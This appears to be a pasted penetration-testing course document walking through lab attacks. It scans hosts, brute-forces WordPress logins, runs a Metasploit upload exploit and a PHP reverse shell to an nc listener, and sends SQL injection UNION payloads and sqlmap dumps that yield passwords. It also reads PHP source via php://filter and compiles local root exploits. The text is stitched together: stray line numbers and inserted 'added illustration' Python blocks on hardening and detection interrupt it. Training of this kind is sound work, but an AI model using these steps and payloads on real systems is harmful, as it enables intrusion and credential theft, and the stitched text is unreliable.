878echo "Done with MongoDB."
879
880
881clear
882# MySQL Servers
883for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
884echo "Done with MySQL."
885
886
887# Add postgres nse scripts
888# References:
889# https://nmap.org/nsedoc/lib/pgsql.html
890# https://nmap.org/nsedoc/scripts/pgsql-brute.html
891#
892
893echo " "
894echo " "
895sleep 1
896clear
897echo "Done, now check your results."
898sleep 2
899clear
900cd /tmp/NetworkAudit/scan/
901ls
902
903
904
905----------------------------------------------------------------------------------------------------------------------------
906-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
907-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
908--------------------------------------------------------------------------------------
909
910 ######################################
911----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
912 ######################################
913
914######################
915# Attacking Minotaur #
916######################
917
918Step 1: Portscan/Bannergrab the target host
919---------------------------Type This-----------------------------------
920sudo nmap -sV 172.31.2.117
921-----------------------------------------------------------------------
922
923
924
925Step 2: Vulnerability scan the web server
926---------------------------Type This-----------------------------------
927nikto.pl -h 172.31.2.117
928-----------------------------------------------------------------------
929
930
931
932Step 3: Directory brute-force the webserver
933---------------------------Type This-----------------------------------
934dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
935-----------------------------------------------------------------------
936
937### dirb output ###
938==> DIRECTORY: http://172.31.2.117/bull/
939-----------------------------------------------------------------------
940
941
942Step 4: Run wordpress vulnerability scanner
943---------------------------Type This-----------------------------------
944wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
945
946
947cewl -w words.txt http://172.31.2.117/bull/
948
949
950cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
951
952wc -l whateverbro.txt
953
954john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
955
956wc -l words-john.txt
957
958wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
959-----------------------------------------------------------------------
960
961
962
963
964
Step 5: Attack the vulnerable WordPress plugin with Metasploit (just doing the exact same attack with MSF)
---------------------------Type This-----------------------------------
msfconsole

use exploit/unix/webapp/wp_slideshowgallery_upload

set RHOST 172.31.2.117

set RPORT 80

set TARGETURI /bull

set WP_USER bully

set WP_PASSWORD Bighornedbulls

exploit
-----------------------------------------------------------------------

Damn... that didn't work. You can't reverse shell from inside the network to a host in the VPN network range.
This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
and then attacking other students from the lab network.


---------------------------Type This-----------------------------------
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

tar -zxvf php-reverse-shell-1.0.tar.gz

cd ~/toolz/php-reverse-shell-1.0/

nano php-reverse-shell.php
-----------------------------------------------------------------------
 ***** change the $ip and $port variables to a host that you have already compromised in the network
 ***** for this example I chose 172.31.2.64 and kept port 1234


---------------------------Type This-----------------------------------
chmod 777 php-reverse-shell.php
cp php-reverse-shell.php ..
-----------------------------------------------------------------------



Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
Paste the contents into a file called wp_gallery_slideshow_146_suv.py
---------------------------Type This-----------------------------------
python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
-----------------------------------------------------------------------



Set up a netcat listener on the previously compromised host
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
 webmin1980


nc -lvp 1234
-----------------------------------------------------------------------




---------------------Type This in your browser ------------------------
http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
-----------------------------------------------------------------------

Now check your listener to see if you got the connection
---------------------------Type This-----------------------------------
id

/sbin/ifconfig

python -c 'import pty;pty.spawn("/bin/bash")'

---------------------------Type This-----------------------------------
cd /tmp
cat >> exploit2.c << out
-----------------------------------------------------------------------
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/

**************hit enter a few times *****************

---------------------------Type This-----------------------------------
out


gcc -o boom2 exploit2.c

./boom2

id
-----------------------------------------------------------------------



---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.181
-----------------------------------------------------------------------
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)


---------------------------Type This-----------------------------------
sudo nmap -sU -p69,161 172.31.2.181
-----------------------------------------------------------------------
PORT    STATE  SERVICE
69/udp  closed tftp
161/udp open   snmp


---------------------------Type This-----------------------------------
sudo apt-get -y install onesixtyone snmp

wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt

onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
-----------------------------------------------------------------------
This gives the error "Community string too long". A little bit of googling and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1
(one entry in the wordlist is longer than onesixtyone's fixed buffer, so drop that line and run it again)

---------------------------Type This-----------------------------------
grep -v TENmanUFactOryPOWER wordlist-common-snmp-community-strings.txt > snmp-community-strings.txt

onesixtyone -c snmp-community-strings.txt 172.31.2.181

snmpwalk -Os -c public -v 1 172.31.2.181
-----------------------------------------------------------------------

The username "eric" turns up in the snmpwalk output, together with the string "There is a house in New Orleans they call it..."

Google the sentence and you find that the whole sentence is "There is a house in New Orleans they call it the rising sun".

Try to SSH to the box using the credentials eric:therisingsun


---------------------------Type This-----------------------------------
ssh -l eric 172.31.2.181
 therisingsun

id
cat /etc/issue
uname -a
cat /etc/*release

---------------------------Type This-----------------------------------
cat >> exploit.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- 'out' is the here-document delimiter given to cat: typed on a line by itself it ends the input and closes the file



---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom

id


......YEAH - do the happy dance!!!!



How to go after 172.31.2.238
Reference: https://t0w3ntum.com/2017/01/07/baffle/


---------------------------------------------------------------
sudo nmap -sV -p 3260 172.31.2.217


sudo apt install open-iscsi

sudo iscsiadm -m discovery -t st -p 172.31.2.217

sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260

sudo iscsiadm -m node -p 172.31.2.217 --login

sudo /bin/bash

fdisk -l
 ***** look for /dev/sda5 - Linux swap / Solaris *******

mkdir /mnt/217vm

mount /dev/sdb /mnt/217vm

cd /mnt/217vm

ls

cat flag1.txt

file bobsdisk.dsk

mkdir /media/bobsdisk

mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

ls

cd /media/bobsdisk/

ls

cat ToAlice.eml

grep flag ToAlice.eml

file ToAlice.csv.enc

cat ToAlice.eml
 ***** look for supercalifragilisticoespialidoso ******

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
 supercalifragilisticoespialidoso
 ***** that word is the password; enter it when openssl prompts for one *****

ls

cat ToAlice.csv

-----------------------------------------------------
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

-----------------------------------------------------
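The openssl enc command above turns the typed password into the AES-256 key and the CBC IV with OpenSSL's legacy EVP_BytesToKey routine (one hash round over password and salt, no key stretching), and the -md flag has to name the digest that was used at encryption time: OpenSSL 1.1.0 changed the default from md5 to sha256, so a file made with one version fails to decrypt with the other unless the digest is given explicitly. The Python below is an added illustration of that derivation and of the "Salted__" header openssl writes; it is not from the page or the lab, the salt and ciphertext bytes are constructed, and it stops at key/IV derivation rather than decrypting (no AES library is assumed).

```python
import hashlib

SALT_MAGIC = b"Salted__"   # 8-byte marker 'openssl enc' writes before the 8-byte salt


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int = 32,
                     iv_len: int = 16, md: str = "sha256"):
    """OpenSSL's legacy EVP_BytesToKey with a single iteration, as 'openssl enc'
    uses it:  D1 = H(pw || salt),  Di = H(D(i-1) || pw || salt),  key || iv = D1 || D2 ...
    One hash round and no stretching is why the password strength carries everything."""
    need = key_len + iv_len
    material = b""
    prev = b""
    while len(material) < need:
        prev = hashlib.new(md, prev + password + salt).digest()
        material += prev
    return material[:key_len], material[key_len:need]


def parse_openssl_header(blob: bytes):
    """Split a file written by 'openssl enc' into (salt, ciphertext)."""
    if len(blob) < 16 or not blob.startswith(SALT_MAGIC):
        raise ValueError("not an 'openssl enc' salted file")
    return blob[8:16], blob[16:]


def derive_for_file(blob: bytes, password: bytes, md: str = "sha256"):
    """Key and IV for aes-256-cbc from the file's salt and the password; 'md' is
    the value of the -md flag (sha256 for OpenSSL >= 1.1.0, md5 for older files)."""
    salt, _ciphertext = parse_openssl_header(blob)
    return evp_bytes_to_key(password, salt, 32, 16, md)


if __name__ == "__main__":
    # constructed sample: an 8-byte salt and one dummy 16-byte ciphertext block
    sample = SALT_MAGIC + bytes(range(8)) + b"\x00" * 16
    key, iv = derive_for_file(sample, b"supercalifragilisticoespialidoso")
    print("key:", key.hex())
    print("iv: ", iv.hex())
    # the same file with -md md5 yields a different key, hence the decrypt failure
    key_md5, _ = derive_for_file(sample, b"supercalifragilisticoespialidoso", md="md5")
    print("same key with md5?", key == key_md5)
```

The derivation is deterministic in (password, salt, digest), which is what makes the wrong -md value fail silently at the padding check rather than at the command line.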

The hints are "Web Path" and "strangest URL", so let's try the long strings as URL paths:
http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
 -- view source

Found this string in the source:
R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK

------ https://www.base64decode.org/ -------
------ Decoded, but didn't find a flag -----


http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
 -- view source --
 -- Nothing in source --

Browsed to the flag link:
view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
 -- view source --
 -- Nothing in source --


Tried reading the PHP source through the php://filter wrapper on the p parameter (p is passed to an include, and the convert.base64-encode filter returns the file base64-encoded instead of executing it):
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php

------ https://www.base64decode.org/ -------
Decode the string returned here:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php

-------------------------------------------------------------------
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>
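The php://filter read above is possible because the p parameter is handed straight to an include: whatever p names gets pulled in, so a stream wrapper or a ../ path is honoured just like a page name. The Python below is an added illustration of the fix, not code from the page or the lab and not the site's PHP; it stands in for the include logic, the page names welcome, party and flag are the ones seen above, the /srv/site/pages directory is assumed, and it pairs an allow-listed resolver with the check a log reviewer or WAF rule would apply to the p value.

```python
import os

PAGES_DIR = "/srv/site/pages"                  # assumed location of the include files
ALLOWED_PAGES = {"welcome", "party", "flag"}   # the page names that exist on the site


def is_wrapper_or_traversal(p: str) -> bool:
    """Detection check for request logs or a WAF rule: a page name never contains
    a scheme (php://, data:, http://), a path separator, '..' or a NUL byte."""
    lowered = p.lower()
    return ("://" in lowered or lowered.startswith("data:") or "/" in p
            or "\\" in p or ".." in p or "\x00" in p)


def resolve_page_safe(p: str, base_dir: str = PAGES_DIR):
    """Hardened include: the name must be in the allow-list, and the resolved path
    must still sit under base_dir (belt and braces against symlinks or a later
    loosening of the list). Returns the file to include, or None to refuse."""
    if p not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, p + ".php"))
    if not target.startswith(base + os.sep):
        return None
    return target


if __name__ == "__main__":
    samples = [
        "flag",                                                   # legitimate
        "php://filter/convert.base64-encode/resource=flag.php",   # source disclosure, as on the page
        "../../etc/passwd",                                       # traversal shape
    ]
    for p in samples:
        print("%-55s flagged=%-5s include=%s" % (p, is_wrapper_or_traversal(p), resolve_page_safe(p)))
```

With the allow-list in place the php://filter string is rejected before any path is built, and the log check lets you find earlier attempts of the same shape in the access log.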





============================================ Attacking another server because I need a reverse shell =========================================
---------------------------------------------------------------------------------------------------------------------------------------------------------

Attack steps:
-------------



Step 1: Ping sweep the target network
-------------------------------------


---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------



- Found 3 hosts
172.31.2.64
172.31.2.217
172.31.2.238



Step 2: Port scan the target system
-----------------------------------


---------------------------Type This-----------------------------------
nmap -sV 172.31.2.64
-----------------------------------------------------------------------



-------------Scan Results--------------------------------------------
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    Apache httpd 2.4.7 ((Ubuntu))
514/tcp  filtered shell
1037/tcp filtered ams
6667/tcp open     irc     ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------


Step 3: Vulnerability scan the webserver
----------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------


Step 4: Run dirbuster or a similar directory brute-force tool against the target
--------------------------------------------------------------------------------


---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.64 -v
-----------------------------------------------------------------------
 or with dirbuster (dirb)

---------------------------Type This-----------------------------------
git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

dirb

./dirb http://172.31.2.64 wordlists/big.txt
-----------------------------------------------------------------------



Step 5: Browse the web site to look for clues
---------------------------------------------
Since no glaring vulnerabilities were found with the scanner, we start by just looking around the website itself.


..... really didn't get much from the scanners, so we just opened the web page in a browser
http://172.31.2.64/

.....browsed to the webpage and saw that it pointed to:
http://172.31.2.64/jabc

....clicked on the documentation link and found hidden text that pointed to here:
http://172.31.2.64/jabcd0cs/

....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
https://www.exploit-db.com/exploits/32075/

Tried the SQL injection described on exploit-db (the add_value parameter is concatenated into the query, so a UNION SELECT with the same number of columns adds rows of the attacker's choosing to the result):
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9

http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9



Tried to run sqlmap against the target


---------------------------Type This-----------------------------------
cd sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------



FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net



---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------

 username: webmin
 hash: b78aae356709f8c31118ea613980954b

https://hashkiller.co.uk/md5-decrypter.aspx

 hash: b78aae356709f8c31118ea613980954b
 pass: webmin1980


ok - /phpmyadmin and /webmin both did not work in the browser, but these credentials worked for SSH.
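The UNION queries above work because ajax_udf.php builds its SQL by string concatenation, so add_value (a table name) and q (a value) become part of the statement text. The Python/sqlite3 program below is an added illustration, not code from OpenDocMan or from the page: the schema is a constructed two-column stand-in for the odm_user table (the MD5 from the dump is reused as sample data), and it shows the concatenating query returning rows from a different table, the hardened version (an allow-list for the identifier, since identifiers cannot be bound as parameters, plus a typed bound parameter for the value), and a crude check for the injection shape that a request-log review can apply.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the app's database (not the real OpenDocMan schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE odm_udf  (id INTEGER, name TEXT);
        INSERT INTO odm_udf VALUES (1, 'department');
        CREATE TABLE odm_user (id INTEGER, username TEXT, password TEXT);
        INSERT INTO odm_user VALUES (1, 'webmin', 'b78aae356709f8c31118ea613980954b');
    """)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, q: str, add_value: str):
    """The vulnerable shape: both request parameters are pasted into the SQL text,
    so add_value can close the FROM clause and append a UNION of its own."""
    sql = "SELECT id, name FROM " + add_value + " WHERE id = " + q
    return conn.execute(sql).fetchall()


ALLOWED_TABLES = {"odm_udf"}    # identifiers cannot be bound, so allow-list them


def lookup_safe(conn: sqlite3.Connection, q: str, add_value: str):
    """Hardened: identifier taken from a fixed set, value coerced to int and bound."""
    if add_value not in ALLOWED_TABLES:
        raise ValueError("table not permitted: %r" % add_value)
    row_id = int(q)              # raises ValueError for anything that is not an integer
    sql = "SELECT id, name FROM %s WHERE id = ?" % add_value
    return conn.execute(sql, (row_id,)).fetchall()


# Heuristic for log review: UNION SELECT, information_schema, or a SQL comment
# inside a parameter value. Expect false positives on free-text fields.
SQLI_HINT = re.compile(r"\bunion\s+(all\s+)?select\b|\binformation_schema\b|--|/\*", re.I)


def looks_like_sqli(param: str) -> bool:
    return bool(SQLI_HINT.search(param))


if __name__ == "__main__":
    db = make_db()
    # constructed payload with the same shape as the page's add_value injection
    payload = "odm_udf WHERE 1=0 UNION SELECT username, password FROM odm_user --"
    print("normal  :", lookup_unsafe(db, "1", "odm_udf"))
    print("injected:", lookup_unsafe(db, "1", payload))
    try:
        lookup_safe(db, "1", payload)
    except ValueError as exc:
        print("hardened refused:", exc)
    print("flagged in log review:", looks_like_sqli(payload))
```

The hardened lookup never sees the injected text as SQL: the table name fails the allow-list and a non-numeric q fails int(), both before any query is built.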



---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
 webmin1980

id

cat /etc/*release
-----------------------------------------------------------------------



....tired of not having a real command shell...


---------------------------Type This-----------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'


cd /tmp

pwd


cat >> exploit.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- 'out' is the here-document delimiter given to cat: typed on a line by itself it ends the input and closes the file



---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom
-----------------------------------------------------------------------


------------exploit failed, damn let's try another one ---------



---------------------------Type This-----------------------------------
cat >> exploit2.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/


out


gcc -o boom2 exploit2.c

./boom2

id


......YEAH - do the happy dance!!!!
=============================================== Now back to the previous server ==============================================================




                 #######################################
----------- ############### # Day 3: Intro to Exploit Development ################ -----------
                 #######################################

The first exploit
https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip

SLMail Scripts Questions

SLmail1.py
How do you start SLMail?
What do you have to be careful of when attaching your debugger to the application?
How many As are you sending to the application?

SLmail2.py
What tool(s) can be used to generate a cyclic pattern?
What port are we attacking?
What verb are we attacking?

SLmail3.py
What is the value contained in EIP?
What is the portion of the cyclic pattern that we must search for?
What is the distance to EIP?

SLmail4.py
What do you overwrite EIP with in this script?
What is the length of your shellcode in this script?
What is the difference between SOCK_STREAM and SOCK_DGRAM?

SLmail5.py
What is struct.pack and why are we using it?
Where is our JMP ESP coming from?
What is the length of our shellcode in this script?

SLmail6.py
Why do you subtract the top of ESP from the bottom of ESP in this script?
What is the length of our shellcode in this script?
What is the distance to EIP in this script?


SLmail7.py
How do you test for bad characters?
What are the bad characters in this script?
What is the address of the JMP ESP in this script and what DLL does it come from?


SLmail8.py
What is DEP and how do you disable it?
What is the purpose of the stack adjustment?
What is the purpose of the NOP sled?


If you got through SLMail comfortably, then try the script below.
https://s3.amazonaws.com/infosecaddictsfiles/ff.zip


Analysis of the exploit code:
https://www.exploit-db.com/exploits/15689/
What is the target platform that this exploit works against?
What is the variable name for the distance to EIP?
What is the actual distance to EIP in bytes?
Describe what is happening in the variable 'junk2'.

Analysis of the training walk-through based on EDB-ID 15689:
https://s3.amazonaws.com/infosecaddictsfiles/ff.zip

ff1.py
What does the sys module do?
What are sys.argv[1] and sys.argv[2]?
What application entry point is being attacked in this script?

ff2.py
Explain what is happening in lines 18 - 20.
What is pattern_create.rb doing and where can I find it?
Why can't I just double click the file to run this script?

ff3.py
Explain what is happening in lines 17 to 25.
Explain what is happening in lines 30 to 32.
Why is everything below line 35 commented out?

ff4.py
Explain what is happening in lines 13 to 15.
Explain what is happening in line 19.
Why is everything below line 35 commented out?

ff5.py
Explain what is happening in line 15.
What is struct.pack?
How big is the shellcode in this script?

ff6.py
What is the distance to EIP?
How big is the shellcode in this script?
What is the total byte length of the data being sent to this app?

ff7.py
What is a tuple in python? Unchangeable list
How big is the shellcode in this script? 1000 Bytes
Did your app crash from this script? No

ff8.py
How big is the shellcode in this script?
What is try/except in python?
What is socket.SOCK_STREAM in Python?

ff9.py
What is going on in lines 19 and 20?
What is the length of the NOPs?
What is socket.SOCK_STREAM in Python?

ff010.py
What is going on in lines 18 - 20?
How would a stack adjustment help this script?
1647How would a stack adjustment help this script?